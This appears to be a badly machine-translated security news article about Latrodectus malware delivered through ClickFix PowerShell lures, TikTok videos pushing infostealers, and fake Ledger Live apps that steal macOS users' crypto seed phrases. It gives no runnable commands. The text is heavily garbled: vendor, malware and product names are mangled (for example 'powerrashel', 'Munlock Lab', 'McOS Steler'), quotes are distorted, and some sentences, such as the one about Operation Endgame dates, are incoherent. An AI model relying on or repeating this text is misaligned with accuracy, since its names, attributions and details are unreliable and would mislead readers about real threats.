Known as malware Lotrodectus The distribution vector has become the latest to embrace widely used social engineering techniques called clickfix.
“Clickfix technique is particularly risky as it allows malware to be executed in memory rather than being written on the disc,” Excel said in a report shared with hackers news. “It removes several opportunities for browsers or safety devices to detect or block malware.”
Latrochectus, the successor of the iCidid is believed to be the name given to a malware that serves as a downloader for other payloads, such as ransomware. It was first documented in April 2024 by Proofpoint and Team Cymru.
Incidentally, malware is one of the many malicious software, which is an operational blow as part of the operation endgeam, which took down 300 servers around the world and bumbled, lactroodectus, cacabot, hijac loader, granabot, danabot, tricbot, and 19 and 22, 2025 from Right 19 and 22, 2025 Gave.
In the latest set of latrochectus attacks viewed by expelled in May 2025, unheard users are cheated to copy and execute a powerrashel command from an infected website, a strategy that has become a popular method to distribute a wide range of malware.
“When run by a user, these commands will try to install a file located on the remote URL using MSIEXEC, and then execute it into memory,” Exales said. “It protects the attacker from writing a file to the computer and being detected by a browser or an antivirus that can detect it on the disc.”
The MSI installer consists of a valid application from NVIDIA, which is used to sideload a malicious DLL, which then uses curls to download the main payload.
To reduce this type of attacks, this group is advised to disable Windows run programs using policy goods (GPO) or to close “Windows + R” Ki through Windows Registry change.
From clickfix to Tiktok
This disclosure has emerged as a description of a new engineering campaign in the form of trend micro, which is likely to be generated using a tiktok video instead of relying on fake captcha pages, which is likely to be generated using artificial intelligence (AI) tools, which distributes users to direct users and distribute the Steallc information to direct the users who distribute the meli Directions of Windows, Microsoft Office, Capcut, and Spotiffy.
These videos have been posted from various tiktok accounts such as @gitallowed, @zane.hughton, @allaivo2, @sysglow.wow, @Alexfixpc, and @digitaldreams771. These accounts are no longer active. One of the video claiming to provide instructions to promote “immediately promote his spotify experience” has collected around 500,000 views, with more than 20,000 likes and more than 100 comments.
The campaign has a new growth of clickfix in which users who discover ways to activate pirated apps are verbally and visually guided, “Windows + R” is directed to open Windows Run Dialogue by pressing the launch powerrashel, and finally compromise the highlight in the video.
Security researcher Juunsteri Dela Cruz said, “The actor of the danger is now using the ticket video that producely generates to activate the powerful commands using AI-operated devices to activate the powerful commands to activate them to activate the valid software or unlock the premium features.”
“This campaign highlights how the attackers are ready to make weapons which are also popular for distributing malware.”
Fake laser apps are used to steal the seed phrases of Mac users
Conclusions also follow the discovery of four separate malware campaigns, which take advantage of a clone version of a laser live app to steal sensitive data, including seed phrases, with the target of removing the cryptocurrency wallet of the victims. Activity continues since August 2024.
Attacks use malicious DMG files, which when launching, launch Applescript to exfiltrate passwords and Apple notes data, and then download a Trojan version of Laser Live. Once the app is opened, it warns users an alleged account problem and requires their seed phrase for recovery. The seed phrase recorded is sent to an attacker-controlled server.
The Munlock Lab, which highlights the campaign, stated that the wicked apps use McOS Steler Malware such as the wicked apps atomic McOS Steel (AMOS) and Odyssey, of which the latter introduced the novel Fishing Scheme in March 2025. It is worth noting that through this mounting, activity with activity with jam is overlap.
“On the dark web forums, the nonsense around the anti-liser schemes is increasing. The next wave is already taking shape.” “Hackers will continue to take advantage of the owners of Trust Crypto in Laser Live.”
